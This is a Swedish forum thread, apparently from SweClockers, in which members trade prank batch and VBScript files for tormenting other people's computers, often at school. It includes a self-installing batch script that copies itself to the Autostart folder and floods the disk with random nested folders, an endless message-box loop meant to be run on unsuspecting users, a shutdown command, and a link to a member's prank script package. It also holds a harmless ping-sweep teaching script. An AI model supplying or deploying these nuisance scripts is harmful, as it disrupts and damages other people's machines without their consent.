Jävulskap & annat kul med .cmd/.bat filer

Permalänk
Medlem

Offtopic: Denna tråden börjar se ut som en svenska kurs snart xD

Ontopic: Ingen som har något nytt jävuelskap eller något annat kul att lägga till?

Permalänk
Medlem

lägg mitt "mappskaparscript" i autostart mappen..

Permalänk
Citat:

Ursprungligen inskrivet av Meggybot
Offtopic: Denna tråden börjar se ut som en svenska kurs snart xD

ne men jag har funderat och den grejen kan vara perfekt för mina glosor jag kan se dom varje gång jag startar daton

Citat:

Ursprungligen inskrivet av 22223
lägg mitt "mappskaparscript" i autostart mappen..

vad är ditt mappskaparscript då jag orkar inte leta

Permalänk
Medlem

överst på förra sidan bara:P

@echo off cls move %0 "C:\Documents and Settings\All Users\Start-meny\Program\Autostart" :mappar md %random%\%random%\%random%\%random%\%random%\%random%\ goto mappar

nu flyttar den sig automatiskt till autostart mappen.

Permalänk
Medlem

Offtopic, Citat från en annan tråd:

Citat:

Ursprungligen inskrivet av OSkar000
*tråd låst*

Då syftet med denna tråd verkar vara att få hjälp med att jävlas med andra så låses den.

Vill du jävlas med andra så får du själv räkna ut hur du ska göra.

.

Ontopic.

Kan man skriva script med en msgbox som flyttar på sig när musen går in över den? Jag kommer ihåg hur man gör i VB men går det att göra det som ett script?

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av str8forthakill

Kan man skriva script med en msgbox som flyttar på sig när musen går in över den? Jag kommer ihåg hur man gör i VB men går det att göra det som ett script?

vet inte riktigt. VBScript är ju inte lika avancerat och har inte lika många funktioner som VB.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av 22223
vet inte riktigt. VBScript är ju inte lika avancerat och har inte lika många funktioner som VB.

Men om jag koplimerar det som en EXE-fil så är det enkelt att ropa på den filen med ett script. Få se vad för jävulskap man kan hitta på då . Ska klura ut om man kan få ikonerna att flytta på sig om man drar musen över dem . Kanske man kan scrambla dem då? Alltså göra så att den sorterar ikonerna med random val, dvs efter namn, skapad osv...

Får forska lite i det!

Permalänk
Medlem

Hur gjode han?

Hej!

En i vår skola gjorde en fil i något scriptspråk som gjorde så att när man gick in på den hände det inget på skärmen. Men om ma sedan skulle klicka nånstans händer det inget, och varken piltangenterna eller mellanslag/enter funkade!
Jag formodar att han skrev det i nåt scriptspråk och sen konverterade över det till en exe-fil, för det var ett program...

Hur gjorde han det, nån som vet?

Tacksam för svar!
Martin

Permalänk
Medlem

Re: Hur gjode han?

Citat:

Ursprungligen inskrivet av Kottizen
Hej!

En i vår skola gjorde en fil i något scriptspråk som gjorde så att när man gick in på den hände det inget på skärmen. Men om ma sedan skulle klicka nånstans händer det inget, och varken piltangenterna eller mellanslag/enter funkade!
Jag formodar att han skrev det i nåt scriptspråk och sen konverterade över det till en exe-fil, för det var ett program...

Hur gjorde han det, nån som vet?

Tacksam för svar!
Martin

skrev han det i notepad?(anteckningar)

Permalänk
Medlem

Japp!

Ja, det gjorde han...
Han skrev det i Notepad, sparade det som en fil med ett tillägg jag inte känner igen. Efter det högerklickade han på filen och valde att öppna det med ett program jag inte heller känner igen...

Permalänk
Medlem

while 1 msgbox("ERROR!") wend

spara som .vbs
det är en popup som inte går att kryssa ner

Permalänk
Medlem

hm... inte det

Joo, det har jag sett innan...
Men, det var ingen VBS-fil och musen funkade inte alls. Jag får fråga skolans dataansvarige om han kan visa vilket program det är...

Ha det bra!
Martin

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av [El Nino]

while 1 msgbox("ERROR!") wend

spara som .vbs
det är en popup som inte går att kryssa ner

den kanske inte går att kryssa ner men det går att stänga av processen i aktivitetshanteraren. (processen heter wscript.exe)

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av 22223
den kanske inte går att kryssa ner men det går att stänga av processen i aktivitetshanteraren. (processen heter wscript.exe)

ja.. men det är kul att köra igång på folk som inte vet!

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av [El Nino]
ja.. men det är kul att köra igång på folk som inte vet!

det förstås

Permalänk
Medlem

Detta får mig att inse att det måste vara en mardröm att vara nätverksadministratör på en skola.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Enzo
Detta får mig att inse att det måste vara en mardröm att vara nätverksadministratör på en skola.

Vaddådå

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av [El Nino]
ja.. men det är kul att köra igång på folk som inte vet!

Eller att göra en fil på skrivbordet på någons dator i skolan -> Han bara MÅÅÅÅÅÅSTE kölla vad den gör. ^^ Vi får inte öppna aktivitetshanteraren på skolan så det går inte stänga av

Permalänk
Medlem

Har kollat runt lite i denna tråden men hittade inte något om hur man kan få en bat eller vbs fil att öppna upp en musik fil.
någon som skulle kunna vara vänlig och berätta?

Permalänk

elller så kan man göra så här man startar notepad och skriver virus.bat och sen trycker man på enter tangenten och skriver start virus.bat

Visa signatur

fuck intel core 2duo and fuck windows vista

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Nock
Har kollat runt lite i denna tråden men hittade inte något om hur man kan få en bat eller vbs fil att öppna upp en musik fil.
någon som skulle kunna vara vänlig och berätta?

Spara som en batfil:

start musik.mp3

--------------

Nu en fråga!

Kan man på något vis göra så att muspekaren flyttar sig till X och Y-positionen, klickar och ja... trycker ner enterknappen automatiskt? Alltså, när man dubbeklickar på en vbs-fil eller annan filtyp?

Tacksam för svar!
Martin

Permalänk
Citat:

Ursprungligen inskrivet av Nvidia_for_life
elller så kan man göra så här man startar notepad och skriver virus.bat och sen trycker man på enter tangenten och skriver start virus.bat

Kan man göra så den inte går att stänga av(utom i aktivitetshanteraren) precis som den liknande saken några inlägg ovanför

Tacksam för svar

Permalänk
Medlem

Så att den stängs av bara rakt av eller?
Spara som en bat-fil:

shutdown -s

Byt ut -s till -l om du vill logga ut eler -r om du vill starta om datorn.

Permalänk

nej, det var inte riktigt så jag menade men tack i alla fall

Det jag menade var att den skulle fortsätta gå men att man inte skulle kunna stänga av den eller byta fönster under tiden det är igång.

Edit: kanske var otydlig men så här skriver man för att t ex få ett fönster:

while 1
msgbox("valfri text")
wend

Men hur gör man för att få det fönstret att vara så att säga aktivt hela tiden?
Så att man inte kan byta till ett annat fönster eller stänga av det (ska hälst gå i aktivitetshanteraren).

Permalänk
Medlem

http://h4ck3r5.pcriot.com/LAN_fun_by_jolt_jokern.zip

lite kul. (det är mitt egna lilla vbscript svineri program)

Permalänk
Citat:

Ursprungligen inskrivet av [KIL]FarmoR
troligen så har admin stängt ner tjänsten messenger.

inte på pohlem

Visa signatur

fuck intel core 2duo and fuck windows vista

Permalänk
Medlem

hallå, det jag tänkte fråga har väll kanske inte med jävulskap att göra.. men men.

är det möjligt att skapa tex. en bat:fil som ändrar upplösning?...

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av xpoze
hallå, det jag tänkte fråga har väll kanske inte med jävulskap att göra.. men men.

är det möjligt att skapa tex. en bat:fil som ändrar upplösning?...

inte vad jag vet

Permalänk

Inte direkt nått djävulskap, men här är ett litet proof-of-the concept script jag plockade i hop till en redovisning som jag höll för skolans stackars ettor i dos och dess efterlevnader i windows.

@ECHO off :windowtitle REM set windowtitle to Pingscan TITLE PINGSCAN v 0.1 :greeting REM Just a simple startup message ECHO ############################## ECHO # Welcome to Pingscan v 0.1 # ECHO # Written by N1ghtCrawler # ECHO ############################## :SETnet REM Get userdefined network to scan ECHO Please enter net to scan without ending zero. ECHO Example: 192.168.1. SET /p net=NET= :SETstart REM Get start of userdefined ip range ECHO Please enter start ip of the ip range (only the last digits) ECHO Example: 1 SET /p ip=Start IP= :setstop REM Get end of userdefined ip range ECHO Please enter the stop of the ip range (only the last digits) ECHO Example: 255 SET /p stop=Stop IP= :doscan REM Do the scan ECHO Hosts online is: :loop REM Loop and increase %ip% 1 every time PING %net%%ip% /n 1 /l 1 /w 10 | FIND "Svar" SET /a ip=ip+1 REM Make the loop stop when %ip% has reached the end of the range IF %ip%==%stop% GOTO done GOTO loop :done ECHO All hosts in range scanned! :exit REM ask the user IF he want to quit SET /p exit=Do you want to quit? (y/n) REM Determine answer IF %exit%==y exit IF not %exit%==y GOTO notyes :notyes REM Determine IF user typed right IF %exit%==n GOTO greeting GOTO exit

Det det gör är altså att scanna igenom ett IP nät efter hostar som är online/svarar på ping. Det klarar endast C-nät. Det här kan inte på nått sätt jämföras med nmap utan det här är endast ett sätt att visa hur man kan använda batch scripting.

Visa signatur

Citera mig gärna om du vill ha svar!

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av N1ghtCrawler
Inte direkt nått djävulskap, men här är ett litet proof-of-the concept script jag plockade i hop till en redovisning som jag höll för skolans stackars ettor i dos och dess efterlevnader i windows.

@ECHO off :windowtitle REM set windowtitle to Pingscan TITLE PINGSCAN v 0.1 :greeting REM Just a simple startup message ECHO ############################## ECHO # Welcome to Pingscan v 0.1 # ECHO # Written by N1ghtCrawler # ECHO ############################## :SETnet REM Get userdefined network to scan ECHO Please enter net to scan without ending zero. ECHO Example: 192.168.1. SET /p net=NET= :SETstart REM Get start of userdefined ip range ECHO Please enter start ip of the ip range (only the last digits) ECHO Example: 1 SET /p ip=Start IP= :setstop REM Get end of userdefined ip range ECHO Please enter the stop of the ip range (only the last digits) ECHO Example: 255 SET /p stop=Stop IP= :doscan REM Do the scan ECHO Hosts online is: :loop REM Loop and increase %ip% 1 every time PING %net%%ip% /n 1 /l 1 /w 10 | FIND "Svar" SET /a ip=ip+1 REM Make the loop stop when %ip% has reached the end of the range IF %ip%==%stop% GOTO done GOTO loop :done ECHO All hosts in range scanned! :exit REM ask the user IF he want to quit SET /p exit=Do you want to quit? (y/n) REM Determine answer IF %exit%==y exit IF not %exit%==y GOTO notyes :notyes REM Determine IF user typed right IF %exit%==n GOTO greeting GOTO exit

Det det gör är altså att scanna igenom ett IP nät efter hostar som är online/svarar på ping. Det klarar endast C-nät. Det här kan inte på nått sätt jämföras med nmap utan det här är endast ett sätt att visa hur man kan använda batch scripting.

Den var ju najjs ;D
men prova detta ist

ECHO ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ECHO º Welcome to Pingscan v 0.1 º
ECHO º Written by N1ghtCrawler º
ECHO ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Kommer att se kungligare ut

Citat:

Ursprungligen inskrivet av xpoze
hallå, det jag tänkte fråga har väll kanske inte med jävulskap att göra.. men men.

är det möjligt att skapa tex. en bat:fil som ändrar upplösning?...

Ja, det finns det. Här under följer några koder MEN!
Var noga med att inte skriva fel för det kan orsaka skador på din dator så att du inte kommer kunna se skärmet pga för stor/liten upplösning....!
(skärmen blinkar..., och även fast ni startar om datorn kommer det underbara windowset att ha sparat dina nya inställningar.)

Ex: :: Ändra till 8 bitars 800x600 skärmuplösning rundll deskcp16.dll,QUICKRES_RUNDLLENTRY 800x600x8 :: Ändra till 16 bitars 800x600 skärmuplösning rundll deskcp16.dll,QUICKRES_RUNDLLENTRY 800x600x16 :: Ändra till 24 bitars 1024x768 skärmuplösning rundll deskcp16.dll,QUICKRES_RUNDLLENTRY 1024x768x24

Och, så vidare.... det är upp till er att testa dessa koderna... Jag har nu varnat er

Åh, justja.... jag skulle vilja att ni gubbar skickade in mer förslag i denna tråd! Tack på förhand!:D;)

http://www.sweclockers.com/forum/showthread.php?s=&postid=814...